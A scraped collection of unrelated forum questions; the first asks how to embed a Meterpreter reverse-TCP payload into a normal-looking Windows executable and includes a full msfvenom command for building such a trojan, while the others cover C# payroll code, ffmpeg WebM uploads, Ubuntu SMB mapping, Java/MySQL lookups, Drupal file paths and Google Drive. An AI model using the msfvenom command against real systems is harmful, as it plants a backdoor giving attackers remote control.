Injecting a payload into an exe file [on hold]

How do you inject a payload (for example windows/x64/meterpreter/reverse_tcp) into an exe file?

Basically, when the target opens the exe file, it looks normal and operates as such but in the background, it creates a backdoor and establishes a connection to the attacker.

I’ve tried using msfvenom like so :

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=x -x /root/testExe.exe -k -a x64 --platform windows -e x64/xor_dynamic -i 3 -n 26 -f exe -o payloadTest.exe 

This didn’t work, every time I tried to run it I got the message :
payloadTest.exe is not a valid Win32 application

Without the -x /root/testExe.exe -k it worked fine.

I’ve also tried shellter but it only works with 32 bit payloads.

The system I’m trying to attack is Windows 7 64 bit. The file “testExe” has a 64 bit architecture and works file without the payload on the victim’s system.

In short, I’m looking for a way to bind the windows/x64/meterpreter/reverse_tcp payload to an exe file called “testExe”, so that when the target opens the “testExe” file, the payload inside the file connects back to the attacker.

I’m trying to learn how payloads are injected into exe files and how they can be detected. I’ve seen some examples with installers that seem legit but they open a meterpreter session for the attacker. Is there a way to confirm that your exe file is legitamate and doesn’t have a backdoor in it (besides checking with antivirus).

C# Employee Pay Data using JSON file

I’m looking for some feedback on my code here. I want to eliminate duplicating the code through the different button_clicks. I’m thinking with a method but nothing I try works better than what I have.

using System; using System.Collections.Generic; using System.Data; using System.IO; using System.Linq; using System.Windows.Forms; using Newtonsoft.Json; using Newtonsoft.Json.Linq;  namespace EmployeePayDataWk4 { public partial class Employee_Pay_Form : Form {             public Employee_Pay_Form()     {         InitializeComponent();                 }      private void Employee_Pay_Form_Load(object sender, EventArgs e)     {         EmployeeDataGridView.ColumnCount = 8;         EmployeeDataGridView.Columns[0].Name = "Employee Name";         EmployeeDataGridView.Columns[1].Name = "Zip Code";         EmployeeDataGridView.Columns[2].Name = "Age";         EmployeeDataGridView.Columns[3].Name = "Monthly Gross Pay";         EmployeeDataGridView.Columns[4].Name = "Department ID";         EmployeeDataGridView.Columns[5].Name = "Developer Type";         EmployeeDataGridView.Columns[6].Name = "Annual Taxes";         EmployeeDataGridView.Columns[7].Name = "Annual Net Pay";                  }      private void LoadAllButton_Click(object sender, EventArgs e)     {         EmployeeDataGridView.Rows.Clear();         //Read from JSON file         string JSONstring = File.ReadAllText("JSON.json");         List<Employee> employees = JsonConvert.DeserializeObject<List<Employee>>(JSONstring);          //Display into DataGridView         foreach (Employee emp in employees)         {             string[] row = { emp.Name, emp.Zip, emp.Age.ToString(), string.Format("{0:C}", emp.Pay),                 emp.DepartmentId.ToString(), SetDevType(emp.DepartmentId),                 string.Format("{0:C}", emp.CalculateTax(emp.Pay)),                 string.Format("{0:C}", AnnualPay(emp.Pay) - emp.CalculateTax(emp.Pay))};             EmployeeDataGridView.Rows.Add(row);         }     }        private void FTEmployeeButton_Click(object sender, EventArgs e)     {         EmployeeDataGridView.Rows.Clear();          //Read from JSON file         string JSONstring = File.ReadAllText("JSON.json");         List<Employee> employees = JsonConvert.DeserializeObject<List<Employee>>(JSONstring);          //LINQ Query for FT Employees         var FTEmp = from emp in employees                     where emp.GetTaxForm == "W2"                     select emp;          //Display into DataGridView         foreach (Employee emp in FTEmp)         {             string[] row = { emp.Name, emp.Zip, emp.Age.ToString(), string.Format("{0:C}", emp.Pay),                 emp.DepartmentId.ToString(), SetDevType(emp.DepartmentId),                 string.Format("{0:C}", emp.CalculateTax(emp.Pay)),                 string.Format("{0:C}", AnnualPay(emp.Pay) - emp.CalculateTax(emp.Pay))};             EmployeeDataGridView.Rows.Add(row);         }     }      private void ContractEmployeeButton_Click(object sender, EventArgs e)     {         EmployeeDataGridView.Rows.Clear();          //Read from JSON file         string JSONstring = File.ReadAllText("JSON.json");         List<Employee> employees = JsonConvert.DeserializeObject<List<Employee>>(JSONstring);          //LINQ Query for Contract Employees         var contractEmp = from emp in employees                           where emp.GetTaxForm == "1099"                           select emp;          //Display into DataGridView         foreach (Employee emp in contractEmp)         {             string[] row = { emp.Name, emp.Zip, emp.Age.ToString(), string.Format("{0:C}", emp.Pay),                 emp.DepartmentId.ToString(), SetDevType(emp.DepartmentId),                 string.Format("{0:C}", emp.CalculateTax(emp.Pay)),                 string.Format("{0:C}", AnnualPay(emp.Pay) - emp.CalculateTax(emp.Pay))};             EmployeeDataGridView.Rows.Add(row);         }     }       //Method to determine developer type     string typeName;     public string SetDevType(int id)     {         if (id == 1)         {             typeName = "Object-Oriented";         }         else if (id == 2)         {             typeName = "Scripts";         }         else { typeName = "Unknown"; }         return typeName;     }      public double AnnualPay(double amount) => 12 * amount; }   class Employee : IFilingStatus {     public Employee() { }      public string Name { get; set; }     public string Zip { get; set; }     public int Age { get; set; }     public double Pay { get; set; }     public int DepartmentId { get; set; }       public string GetTaxForm { get; set; }      public double CalculateTax(double basis)     {         double monthlyTax;           if ((GetTaxForm == "W2") || (GetTaxForm == "w2"))         {             monthlyTax = .07 * basis;         }         else         {             monthlyTax = 0;         }         return 12 * monthlyTax;     }     public double AnnualPay(double amount) => 12 * amount; }  public interface IFilingStatus {     double CalculateTax(double basis); }  } 

Cannot upload a WebM file containing OPUS audio and a still image as VP9 video to Youtube

I cannot upload a WebM file containing OPUS audio and a still image (a png file) as VP9 video to Youtube, Youtube says :

The video has failed to process. Please make sure you are uploading a supported file type.

This google page says WebM is supported.

I used ffmpeg to create the WebM file with the following line :

$   ffmpeg -i myOriginialPureAudioFile-CUT.opus -i myAudioFile.png -ac 2 -af aresample=48k -b:a 128k -r ntsc -s 640x360 myAudioFile.webm 

The resulting WebM file looks like this :

$   ffprobe myAudioFile.webm Input #0, matroska,webm, from 'myAudioFile.webm':   Metadata:     ENCODER         : Lavf57.83.100   Duration: 00:06:00.01, start: -0.007000, bitrate: 104 kb/s     Stream #0:0: Video: vp9 (Profile 0), yuv420p(tv, progressive), 640x360, SAR 1:1 DAR 16:9, 29.97 fps, 29.97 tbr, 1k tbn, 1k tbc (default)     Metadata:       ENCODER         : Lavc57.107.100 libvpx-vp9       DURATION        : 00:00:00.040000000     Stream #0:1(eng): Audio: opus, 48000 Hz, stereo, fltp (default)     Metadata:       title           : unnamed       ENCODER         : Lavc57.107.100 libopus       DURATION        : 00:06:00.008000000 

I tried different standard frame rates, bit rates, resolutions and audio sampling frequencies for half of my weekend, nothing seems to satisfy YouTube, can you please help me ?

Ubuntu map CIFS / SMB share using active domain credentials without password file

Is there a way in Ubuntu 18.04 to map an SMB share when the users login without using a password file? The boxes I have are members of a Windows Active Directory domain and the users will use their domain credentials to authenticate. I want to automatically map drives for users and have the login be essentially passed from the user context like it is in Windows. I know there is the FSTAB and a way to use a password file for that, but I want to avoid making the users update that file when they change their domain password if possible.

How to point on value from csv file and compare it to values from MySQL DB table? [on hold]

I have MySQL DB table my_dictionary, containing soundex_code,word, translation

Also, I have a csv file containing sentences separated by ‘,’. Each sentence contains a set of words separated by ‘ ‘.

I would like to read each word from the csv file and compare it with values of the column soundex_code from my_dictionary. And return its equivalent ‘translation’ I started this code but I didn’t know how to point on each word from my csv file and compare it.

import java.sql.*;  public class dbConnection {      public static void main (String [] args) throws Exception {           String url = "jdbc:mysql://localhost:3306/dictionary";           String user = "root";            String password = "";         String query = "select translation from my_dictionary where soundex_code='3tl00'";          Class.forName("com.mysql.cj.jdbc.Driver");         Connection con = DriverManager.getConnection(url, user, password);          Statement st = con.createStatement();         ResultSet rs = st.executeQuery(query);         rs.next();         String name = rs.getString("translation");           System.out.println(name);         st.close();         con.close();      }  } 

How to get a file path of the node?

For my Drupal 8 website I need to implement a PDF downloader. I have created a content type; which has a “File upload” fields. I have created a view, where all the titles of the nodes are displayed. In combination of “Views Bulk Operations” module and external php library I have created a new Action. After the user cheched the nodes, which he would like to download, the action should be initialized. My question is, how can I get the path to the file in the execute() function?

/** * {@inheritdoc} */ public function execute($  entity = NULL) {  // Do some processing.. /* $  node = Node::load(nid); $  file_path = drupal_realpath($  node->field_pdf_file->entity->getFileUri()); $  file_name = $  node->field_pdf_file->entity->getFilename(); */ // Access nodes pdf field  // Merge them  $  merger->addFile($  file_name);  $  createdPdf = $  merger->merge();  return $  this->t('Some result'); } 

What does it mean to delete a file that’s “shared with me” in Google Drive?

I don’t use Google Drive very much, but I noticed I had a couple of files in the “shared with me” section of the Google Drive web app. So I decided to remove them from view, and the only way to do that is to delete them, one by one.

Removed one file.

One removed file is still accessible by collaborators.

I don’t own any of these files. They were shared with me. So what exactly did I just remove then? I can’t possibly remove things that I don’t own? I assume that the last notification indicates that the owner can still access his own file… duh! But the question still remains, what is it that I’m removing then? Removing myself from the access list of a file I didn’t own in the first place?…

Interestingly, most of these files were things like PDF files and shared Google Maps locations, things that were shared publicly, links to which I must have clicked on at some point on different websites. So I was never really “collaborating” with any of these people, the owners of these files, so they never shared the links to these files with me directly and I was never on any kind of access list.